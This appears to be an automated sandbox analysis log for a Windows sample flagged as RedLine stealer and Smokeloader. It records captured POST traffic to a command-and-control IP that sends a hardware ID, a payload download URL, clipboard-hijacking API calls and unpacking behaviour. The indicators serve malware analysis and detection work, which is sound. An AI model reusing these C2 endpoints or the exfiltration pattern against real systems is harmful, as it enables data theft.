                  Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBGHost: 62.204.41.177Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 46 42 45 43 44 45 31 32 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="hwid"0EFBECDE1239786254513------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="build"default9_cap------ECGDHDHJEBGHJKFIECBG--
                  Source: mCe4hBfqCT.exe, mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp, mCe4hBfqCT.exe, 00000000.00000003.4371587584.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, mCe4hBfqCT.exe, 00000000.00000002.4504361306.0000000002DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
                  Source: mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe)
                  Source: mCe4hBfqCT.exe, 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE
                  Source: mCe4hBfqCT.exe, 00000000.00000003.4371587584.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, mCe4hBfqCT.exe, 00000000.00000002.4504361306.0000000002DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeY
                  Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, 64A.tmp.exe, 00000002.00000002.2422523199.0000000002D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177
                  Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/
                  Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php
                  Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php1nZ
                  Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpfj
                  Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpunf
                  Source: 64A.tmp.exe, 00000002.00000002.2422523199.0000000002D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177sLA
                  Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                  Source: mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                  Source: mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/6
                  Source: mCe4hBfqCT.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                  Source: mCe4hBfqCT.exe, 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                  Source: mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                  Source: mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEf
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,EntryPoint,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,EntryPoint,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03011947 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_03011947
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,EntryPoint,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000000.00000002.4504249917.0000000002D29000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000002.00000002.2422568211.0000000002D19000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0301237D NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_0301237D
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03012621 NtdllDefWindowProc_W,PostQuitMessage,0_2_03012621
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_004280420_2_00428042
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_004071D00_2_004071D0
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_004373F90_2_004373F9
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_004274A40_2_004274A4
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0042D50E0_2_0042D50E
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_004285800_2_00428580
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_004166CF0_2_004166CF
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0043D6980_2_0043D698
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_004137450_2_00413745
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_004278160_2_00427816
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0040E9990_2_0040E999
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_00427AC00_2_00427AC0
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_00418ACF0_2_00418ACF
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0042EB000_2_0042EB00
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_00436CDF0_2_00436CDF
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_00427D870_2_00427D87
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_00413F2B0_2_00413F2B
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_030382A90_2_030382A9
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0303ED670_2_0303ED67
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_030241920_2_03024192
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0303770B0_2_0303770B
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0303D7750_2_0303D775
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_030387E70_2_030387E7
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03037A7D0_2_03037A7D
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_030269360_2_03026936
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_030239AC0_2_030239AC
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03046F460_2_03046F46
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03037FEE0_2_03037FEE
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03037D270_2_03037D27
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03028D360_2_03028D36
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0303ED670_2_0303ED67
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0301EC000_2_0301EC00
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: String function: 004045C0 appears 317 times
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: String function: 00410740 appears 53 times
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: String function: 0040F928 appears 36 times
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: String function: 030209A7 appears 53 times
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: String function: 0040FDD7 appears 125 times
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: String function: 0302003E appears 121 times
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1044
                  Source: mCe4hBfqCT.exeBinary or memory string: OriginalFileName vs mCe4hBfqCT.exe
                  Source: mCe4hBfqCT.exe, 00000000.00000003.2070986287.0000000004890000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs mCe4hBfqCT.exe
                  Source: mCe4hBfqCT.exe, 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs mCe4hBfqCT.exe
                  Source: mCe4hBfqCT.exe, 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs mCe4hBfqCT.exe
                  Source: mCe4hBfqCT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.4504249917.0000000002D29000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000002.00000002.2422568211.0000000002D19000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: mCe4hBfqCT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 64A.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@1/3
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_02D2A26E CreateToolhelp32Snapshot,Module32First,0_2_02D2A26E
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,2_2_00413720
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\track_prt[1].htmJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeMutant created: \Sessions\1\BaseNamedObjects\48rt8k8rt4rwe5rb
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5576
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeFile created: C:\Users\user\AppData\Local\Temp\64A.tmpJump to behavior
                  Source: mCe4hBfqCT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: mCe4hBfqCT.exeReversingLabs: Detection: 39%
                  Source: mCe4hBfqCT.exeVirustotal: Detection: 41%
                  Source: unknownProcess created: C:\Users\user\Desktop\mCe4hBfqCT.exe "C:\Users\user\Desktop\mCe4hBfqCT.exe"
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeProcess created: C:\Users\user\AppData\Local\Temp\64A.tmp.exe "C:\Users\user\AppData\Local\Temp\64A.tmp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1044
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeProcess created: C:\Users\user\AppData\Local\Temp\64A.tmp.exe "C:\Users\user\AppData\Local\Temp\64A.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeUnpacked PE file: 0.2.mCe4hBfqCT.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.meridu:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeUnpacked PE file: 2.2.64A.tmp.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.nuhi:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeUnpacked PE file: 0.2.mCe4hBfqCT.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeUnpacked PE file: 2.2.64A.tmp.exe.400000.1.unpack
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC7E
                  Source: mCe4hBfqCT.exeStatic PE information: section name: .meridu
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .nuhi
                  Source: 64A.tmp.exe.0.drStatic PE information: section name: .nuhi
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_00410786 push ecx; ret 0_2_00410799
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0040FDB1 push ecx; ret 0_2_0040FDC4
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_02D2B0BB push es; iretd 0_2_02D2B0CC
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_02D2F60D push ecx; ret 0_2_02D2F62A
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_02D2F48F pushad ; ret 0_2_02D2F4AB
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_02D2B596 push E8665AC8h; iretd 0_2_02D2B59B
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_02D2DB51 push FFFFFFADh; ret 0_2_02D2DBC3
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_02D2CE84 push 00000003h; ret 0_2_02D2CE88
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03020018 push ecx; ret 0_2_0302002B
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_030479BF push esp; retf 0_2_030479C7
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_030209ED push ecx; ret 0_2_03020A00
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03047FBD push esp; retf 0_2_03047FBE
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03049E08 pushad ; retf 0_2_03049E0F
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0041B035 push ecx; ret 2_2_0041B048
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0040020D pushfd ; iretd 2_2_00400211
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02D1B383 push 7DD07DC0h; iretd 2_2_02D1B394
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02D1E353 push eax; ret 2_2_02D1E371
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02D1E362 push eax; ret 2_2_02D1E371
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02D1A87D pushfd ; iretd 2_2_02D1A880
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F1B29C push ecx; ret 2_2_02F1B2AF
